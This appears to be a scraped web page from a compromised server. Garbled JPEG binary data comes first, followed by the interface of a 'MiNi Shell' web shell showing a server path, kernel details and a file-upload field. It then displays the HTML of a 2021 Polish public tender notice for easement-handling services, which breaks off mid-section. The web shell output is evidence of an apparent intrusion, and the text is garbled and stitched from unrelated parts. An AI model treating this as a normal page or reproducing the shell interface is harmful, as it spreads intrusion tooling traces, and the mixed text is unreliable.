JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20210903/

Linux eb5096292c53 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20210903/0016986101-N-2021.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Usługi polegające na prowadzeniu spraw związanych z ustanawianiem ograniczonych praw rzeczowych (służebności) na obszarze właściwości KOWR OT we Wrocławiu </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Krajowy Ośrodek Wsparcia Rolnictwa</span></h3> <h3 class="mb-0">1.3.) Oddział zamawiającego: <span class="normal">Oddział Terenowy we Wrocławiu</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 367849538</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Mińska 60</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Wrocław</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">54-610</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">dolnośląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL514 - Miasto Wrocław</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zamowienia.publiczne.wroclaw@kowr.gov.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://bip.kowr.gov.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - agencja wykonawcza</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> gospodarowanie nieruchomościami Skarbu Państwa </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Usługi polegające na prowadzeniu spraw związanych z ustanawianiem ograniczonych praw rzeczowych (służebności) na obszarze właściwości KOWR OT we Wrocławiu </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-69e3c1d1-0c7a-11ec-b885-f28f91688073</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00169861</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-09-03</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00011827/14/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.21 Usługi dotyczące mienia związanego z infrastrukturą techniczną znajdującą się na terenie właściwości OT KOWR we Wrocławiu na terenie woj. dolnośląskiego w zakresie ograniczonych praw rzeczowych</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://kowr.eb2b.com.pl/ <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://kowr.eb2b.com.pl/</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1.Korzystanie z Platformy wymaga zarejestrowania konta na Platformie. Wykonawca w ce-lu<br/>rejestracjiprzechodzi do Formularza rejestracyjnego poprzez zakładkę „LOGOWANIE” oraz<br/>opcję„ZAREJESTRUJ SIĘ”. Po wypełnieniu formularza rejestracyjnego Wykonawca otrzymuje e-maila<br/>informującego,że może dokonać pierwszego logowania do Platformy.2. Minimalne<br/>wymaganiatechniczne i organizacyjne korzystania z Platformy określa Regulamin Platformy Zakupowej<br/>(dostępnypod adresem https://platforma.eb2b.com.pl/user/terms).3. Instrukcja korzystania z<br/>PlatformyZakupowej dostępna jest w zakładce „Pomoc/Instrukcje”.4. Wykonawca przystępując do<br/>postępowaniao udzielenie zamówienia publicznego, akceptuje wa-runki korzystania z platformy,<br/>określone winstrukcji korzystania z platformy oraz w regulaminie platformy. Wykonawca korzystając z<br/>platformyzobowiązuje się do przestrzegania postanowień za-wartych w ww. instrukcji oraz w<br/>regulaminieplatformy.5. System umożliwia dodanie plików o wielkości do 50 MB. Zamawiający<br/>dopuszcza wszczegól-ności pliki w formatach: .doc, .docx, .xls, .xlsx, .pdf, .jpg, .zip, .rar.6.<br/>Korespondencjaelektroniczna inna niż oferta Wykonawcy i załączniki do oferty, odbywa się<br/>elektronicznie zapośrednictwem Platformy w zakładce „Pytania/Informacje”.7. Za datę wpływu oferty,<br/>oświadczenia, októrym mowa w art. 125 ust 1 ustawy PZP, podmiotowych środków dowodowych, w<br/>tym oświadczenia,o którym mowa w art. 117 ust. 4 ustawy PZP, zobowiązania podmiotu<br/>udostępniającego zasoby,przedmiotowych środków dowodowych, pełno-mocnictw, oraz innych<br/>informacji, dokumentów ioświadczeń przyjmuje się datę ich wczytywania do systemu (przesłania na<br/>Platformę).8 Plik ofertyzałączony przez Wykonawcę na Platformie i zapisany, widoczny jest w systemie<br/>jako zaszyfrowany.Możliwość otworzenia pliku dostępna jest dopiero po odszyfrowaniu przez Zamawia-jącego po upływieterminu składania ofert.10. Zamawiający określa następujące niezbędne<br/>wymagania sprzętowo -aplikacyjne umożliwiają-ce pracę na Platformie: 1) stały dostęp do sieci Internet<br/>o gwarantowanej przepustowości nie mniejszej niż 2 mb/s; 2) komputer klasy PC lub PC lub MAC, o<br/>następującejkonfiguracji: pamięć min. 4GB Ram, proce-sor Intel IV 4GHZ, jeden z systemów<br/>operacyjnych - MSWindows 7, Mac Os x 10.4, Linux lub ich nowsze wersje; 3) zainstalowana dowolna<br/>najnowsza wersjaprzeglądarki internetowej; w przypadku Internet Explorer minimalnie wersja 11.0; 4)<br/>włączona obsługaJavaScript; 5) zainstalowany program Acrobat Reader. 11. Sposób sporządzenia<br/>dokumentówelektronicznych, oświadczeń lub elektronicznych kopii do-kumentów lub oświadczeń musi<br/>być zgodny zwymaganiami określonymi w Rozporządzeniach, o których mowa w ust. 2 SWZ. 12.<br/>Zamawiający nieprzewiduje sposobu komunikowania się z Wykonawcami w inny sposób niż przy<br/>użyciu środków komunikacji elektronicznej wskazanej w SWZ.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu<br/>Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w<br/>związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz<br/>uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z<br/>04.05.2016, str. 1), dalej jako „RODO”, wszystkie osoby, które ubiegają się o udzielenie zamówienia/<br/>złożyły ofertę. Zamawiający informuje, że: 1. Administrator danych osobowychAdministratorem, czyli<br/>podmiotem decydującym o celach i środkach przetwarzania Pani/Pana danych osobowych, jest<br/>Krajowy Ośrodek Wsparcia Rolnictwa (zwany dalej KOWR) z siedzibą w Warszawie (01-207) przy ul.<br/>Karolkowej 30. Z administratorem może się Pani/Pan skontaktować poprzez adres e-mail:<br/>kontakt@kowr.gov.pl lub pisemnie na adres korespondencyjny: Krajowy Ośrodek Wsparcia Rolnictwa,<br/>ul. Karolkowa 30, 01-207 Warszawa. 2. Inspektor Ochrony Danych OsobowychW KOWR wyznaczono<br/>Inspektora Ochrony Danych Osobowych, z którym może się Pani/Pan skontaktować w sprawach<br/>ochrony i przetwarzania swoich danych osobowych pod adresem e-mail: iodo@kowr.gov.pl lub<br/>pisemnie na adres naszej siedziby, wskazany w ust. 1.3. Cele i podstawy prawne przetwarzania<br/>danych osobowychPani/Pana dane osobowe przetwarzane będą w celach związanym z<br/>postępowaniem o udzielenie zamówienia publicznego prowadzonym na podstawie ustawy z dnia 11<br/>września 2019 r. Prawo zamówień publicznych – Dz.U. z 2019 r. poz. 2019 z póżn. zm. (dalej PZP), w<br/>celach związanych z realizacją obowiązków administratora jako Zamawiającego, które wynikają z<br/>obowiązujących przepisów prawa. Pani/Pana dane osobowe przetwarzane będą także w celu realizacji<br/>obowiązku prowadzenia ewidencji korespondencji i archiwizacji dokumentacji zgodnie z ustawą z dnia<br/>14 lipca 1983 r. o narodowym zasobie archiwalnym i archiwach (Dz. U. z 2020 r. poz. 164 z późn.<br/>zm.).4. Odbiorcy danych osobowychPani/Pana dane pozyskane w związku z postępowaniem o<br/>udzielenie zamówienia publicznego przekazywane będą wszystkim zainteresowanym podmiotom i<br/>osobom, gdyż co do zasady postępowanie o udzielenie zamówienia publicznego jest<br/>jawne.Ograniczenie dostępu do Pani/Pana danych, o których mowa wyżej może wystąpić jedynie w<br/>szczególnych przypadkach, jeśli jest to uzasadnione ochroną prywatności, zgodnie z art. 18 ust 5 pkt 1<br/>i 2 PZP.Pani/Pana dane osobowe mogą być udostępniane innym osobom lub podmiotom jeżeli<br/>obowiązek taki będzie wynikać z przepisów prawa. Do Pani/Pana danych mogą też mieć dostęp<br/>podmioty przetwarzające dane w naszym imieniu, np. podmioty świadczące pomoc prawną, usługi<br/>informatyczne, usługi niszczenia dokumentów, jak również inni administratorzy danych osobowych<br/>przetwarzający dane we własnym imieniu, np. podmioty prowadzące działalność pocztową lub<br/>kurierską.5. Okres przetwarzania danych osobowych Pani/Pana dane osobowe będą przetwarzane<br/>przez okres przewidziany przepisami prawa w tym zakresie, w tym przez okres przechowywania<br/>dokumentacji określony w przepisach powszechnych i uregulowaniach wewnętrznych KOWR w<br/>zakresie archiwizacji dokumentów, okres przedawnienia roszczeń przysługujących KOWR i w stosunku<br/>do niego.Dokumentacja dotycząca postępowania o udzielenie zamówienia publicznego będzie przechowywana, zgodnie z art. 78 ust. 1 PZP, przez okres 4 lat od dnia zakończenia postępowania o<br/>udzielenie zamówienia, licząc od dnia 1 stycznia roku następnego po dniu zakończenia postępowania,<br/>a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania<br/>umowy. ciąg dalszy w kolejnej w polu RODO (ograniczenia stosowania)</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">ciąg dalszy pola RODO (obowiązek informacyjny)6.<br/>Informacja o wymogu/dobrowolności podania danych osobowychPodanie Pani/Pana danych<br/>osobowych w związku z udziałem w postępowaniu o udzielenie zamówienia ma charakter dobrowolny,<br/>ale jest niezbędne do wzięcia w nim udziału. 7. Prawa osób, których dane dotycząZgodnie z RODO<br/>przysługuje Pani/Panu:1) prawo dostępu do swoich danych oraz otrzymania ich kopii; 2) prawo do<br/>sprostowania (poprawiania) swoich danych; 3) prawo do usunięcia danych osobowych, w sytuacji, gdy<br/>przetwarzanie danych nie następuje w celu wywiązania się z obowiązku wynikającego z przepisu<br/>prawa lub w ramach sprawowania wła-dzy publicznej; 4) prawo do ograniczenia przetwarzania danych,<br/>przy czym przepisy odrębne mogą wyłączyć moż-liwość skorzystania z tego prawa.Jeżeli chce<br/>Pani/Pan skorzystać z któregokolwiek z tych uprawnień, prosimy o kontakt z Inspektorem Ochrony<br/>Danych Osobowych, wskazany w pkt 2 lub pisemnie na adres korespondencyjny, wskazany w pkt<br/>1.Zgodnie z RODO, każdej osobie, której dane są przetwarzane przysługuje prawo do wniesienia<br/>skargi do Prezesa Urzędu Ochrony Danych Osobowych. 8. Zautomatyzowane podejmowanie decyzjiW<br/>oparciu o Pani/Pana dane osobowe administrator nie będzie podejmował wobec Pani/Pana<br/>zautomatyzowanych decyzji, w tym decyzji będących wynikiem profilowania. 9. Przekazywanie danych<br/>poza Europejski Obszar GospodarczyW związku z jawnością postępowania o udzielenie zamówienia<br/>publicznego Pani/Pana dane mogą być przekazywane do państw trzecich (tj. państwa, które nie należy<br/>do Europejskiego Obszaru Gospodarczego obejmującego Unię Europejską, Norwegię, Liechtenstein i<br/>Islandię), z zastrzeżeniem, o którym mowa w punkcie 4.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">WRO.WOP.260.31.2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.5.) Wartość zamówienia: <span class="normal"> 133609,76 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia są usługi polegające na prowadzeniu spraw związanych z<br/>ustanawianiem ograniczonych praw rzeczowych (służebności) na obszarze właściwości<br/>Oddziału Terenowego Krajowego Ośrodka Wsparcia Rolnictwa we Wrocławiu, to jest na terenie<br/>woj. dolnośląskiego (obszar obejmujący: miasto Wrocław i powiaty: wrocławski, oławski,<br/>oleśnicki, milicki, trzebnicki, wołowski, średzki). W ramach realizacji usług Wykonawca<br/>zobowiązany będzie do:<br/>1) Kompletowania i sprawdzania dokumentacji i informacji w zakresie konkretnych spraw<br/>dotyczących<br/>ograniczonych praw rzeczowych oraz zajęć czasowych w tym rejestracji spraw w<br/>wewnętrznym systemie komputerowym.<br/>2) Przygotowania korespondencji i redagowania odpowiedzi, udzielania informacji w tym min. inwestorom zewnętrznym, dotyczących budowy, przebudowy, modernizacji, remontów sieci<br/>infrastruktury technicznej oraz przebiegu sieci infrastruktury technicznej na gruntach będą-cych<br/>w Zasobie Własności Rolnej Skarbu Państwa i gruntach sąsiednich.<br/>3) Sprawdzania stanu prawnego nieruchomości będących w Zasobie WRSP, a będących<br/>przedmiotem<br/>ustanowienia ograniczonych praw rzeczowych oraz czasowego zajęcia nieruchomo-ści.<br/>4) Lustracji nieruchomości Zasobu WRSP, będących przedmiotem ustanowienia ograniczonych<br/>praw rzeczowych oraz czasowego zajęcia nieruchomości.<br/>5) Opracowywania dokumentacji, projektów umów regulujących zasady udostępniania<br/>inwestorom<br/>nieruchomości będących w Zasobie WRSP (pod budowę infrastruktury technicznej lub sieci<br/>i urządzeń przesyłowych).<br/>6) Dokumentowania spraw związanych z ustanowieniem ograniczonych praw rzeczowych lub<br/>czasowego zajęcia nieruchomości, dotyczących budowy, przebudowy, modernizacji, remon-tów<br/>sieci infrastruktury technicznej oraz przebiegu sieci infrastruktury technicznej na<br/>nieruchomościach<br/>znajdujących się w Zasobie Własności Rolnej Skarbu Państwa i gruntach sąsiednich.<br/>7) Opracowywania wniosków do postępowań na usługi wyceny nieruchomości w trybie<br/>przepisów<br/>ustawy Prawo zamówień publicznych.<br/>8) Nadzoru nad prawidłowym wykonaniem operatów szacunkowych sporządzonych na<br/>podstawie<br/>umów zawartych w ramach udzielenia zamówienia publicznego dotyczącego wyceny<br/>służebności<br/>przesyłu, służebności gruntowej lub odszkodowań dotyczących nieruchomości.<br/>9) Naliczania wysokości opłat za ustanowienie ograniczonych praw rzeczowych lub zajęcia<br/>nieru-chomości na podstawie operatów szacunkowych sporządzonych przez rzeczoznawców<br/>mająt-kowych.<br/>10) Protokolarnego przekazywania oraz odbioru nieruchomości związanych z realizacją usług<br/>zgodnie z zawartymi umowami.<br/>11) Prowadzenia rejestrów umów oraz zgód czasowych w zakresie realizowanej umowy.<br/>12) Kompletowania, prowadzenia uzgodnień, sprawdzania dokumentów i umów oraz przesyłanie<br/>dokumentacji w celu sporządzenia aktu notarialnego dla ustanowienia służebności z całego<br/>terenu działania OT KOWR we Wrocławiu.<br/>3.4 Powyższe usługi (w tym prace terenowe) będą wykonywane w czasie 150 godzin<br/>miesięcznie w biurze Zamawiającego, mieszczącym się w Legnicy przy ul. Jaworzyńskiej 199 przez<br/>osobę wskazaną w ofercie. Zamawiający dopuszcza możliwość pełnienia dyżuru przez<br/>maksymalnie jedną osobę.<br/>3.5 Wykonawca będzie realizował usługi osobiście lub delegując do prac swojego pracownika<br/>lub pracownika lub osobę, z którą wykonawcę łączy inny stosunek cywilno-prawny oraz przy<br/>użyciu własnych środków transportu.<br/>3.6 Zamawiający zapewni Wykonawcy nieodpłatną obsługę organizacyjno-techniczną, w tym:<br/>1) wyposażone stanowisko pracy biurowej, z dostępem do podstawowych urządzeń<br/>technicznych, w tym komputera, kopiarki, telefonu, umożliwiające wykonywanie czynności w<br/>zakresie przewidzianym umową,<br/>2) dostęp do systemów informatycznych zasobów informacyjnych oraz materiałów źródłowych<br/>umożliwiających prawidłową realizację umowy,<br/>3) wysyłanie i odbiór korespondencji związanej ze świadczoną usługą,<br/>4) telefon służbowy, odbiornik GPS, aparat fotograficzny wyłącznie do użytku związanego z<br/>realizacją niniejszej umowy.<br/>3.7 Przed wystawieniem faktury za wykonane usługi, wykonawca zobowiązany będzie do<br/>sporządzania wykazów z wykonanych usług w szczególności rozliczeń finansowych,<br/>jakościowych i ilościowych dla prowadzonych spraw wraz z rozliczeniem godzinowym.<br/>3.8 W oparciu o art. 121 ustawy Prawo Zamówień Publicznych, Zamawiający zastrzega obowiązek osobistego wykonania przez Wykonawcę kluczowych części zamówienia. Kluczową<br/>częścią zamówienia dla Zamawiającego są czynności wymienione w ust. 3.3 pkt. 1), 3), 5), 6),<br/>8), 9), 10) i 12) oraz pełnienie dyżuru w biurze Zamawiającego.<br/>3.9 Pozostałe warunki realizacji zamówienia zawarte są w projektowanych postanowieniach<br/>umowy, które zostaną wprowadzone do treści umowy, stanowiących załącznik nr 3 SWZ.<br/>Złożenie oferty jest jednoznaczne z akceptacją projektowanych postanowień umowy, które<br/>zostaną wprowadzone do treści umowy.<br/>3.10 Zamawiający informuje, iż średnio w okresie jednego miesiąca:<br/>1) wpływa około 30 wniosków dot. ustanowienia ograniczonych praw rzeczowych (służebności)<br/>na gruntach będących w Zasobie Własności Rolnej Skarbu Państwa i gruntac20 godzin na<br/>dokonanie lustracji gruntów Zasobu Własności Rolnej Skarbu Pań-stwa, będących przedmiotem<br/>ustanowienia ograniczonych praw rzeczowych (służebności);<br/>3) sporządza się ok. 10 projektów regulujących zasady udostępniania inwestorom gruntów<br/>Zasobu<br/>Własności Rolnej Skarbu Państwa będących przedmiotem ustanowienia ograniczonych<br/>praw rzeczowych (służebności);<br/>4) następuje ok. 5 przekazań oraz ok. 5 odbiorów nieruchomości przedmiotem ustanowienia<br/>ograniczonych praw rzeczowych (służebności).<br/>Podane wyżej wartości są wartościami przybliżonymi i zostały podane w celu ułatwienia<br/>oszacowania ceny oferty. Podane wartość nie są stałe i nie należy uznawać ich za wartości<br/>pewne. Wartości te w każdym miesiącu mogą być różne (mniejsze bądź większe) w zależności<br/>od ilości spraw do realizacji. Przekroczenie w/w. wartości nie podlega żadnym dodatkowym<br/>rozliczeniom z Zamawiającym. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">70100000-2 - Usługi w zakresie obsługi nieruchomości własnych</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">24 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zamawiający będzie oceniał oferty według następujących kryteriów:<br/>1 Kryterium „Cena brutto za przedmiot zamówienia” (Kc) Waga -60%<br/>2 Kryterium „Kwalifikacje i doświadczenie osób wyznaczonych do bezpośredniej realizacji zamówienia”<br/>(Kkd) Waga- 40%. Sposób przyznania punktów w poszczególnych kryteriach opisano w ust. 18 SWZ</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Kwalifikacje i doświadczenie osób wyznaczonych do bezpośredniej realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje 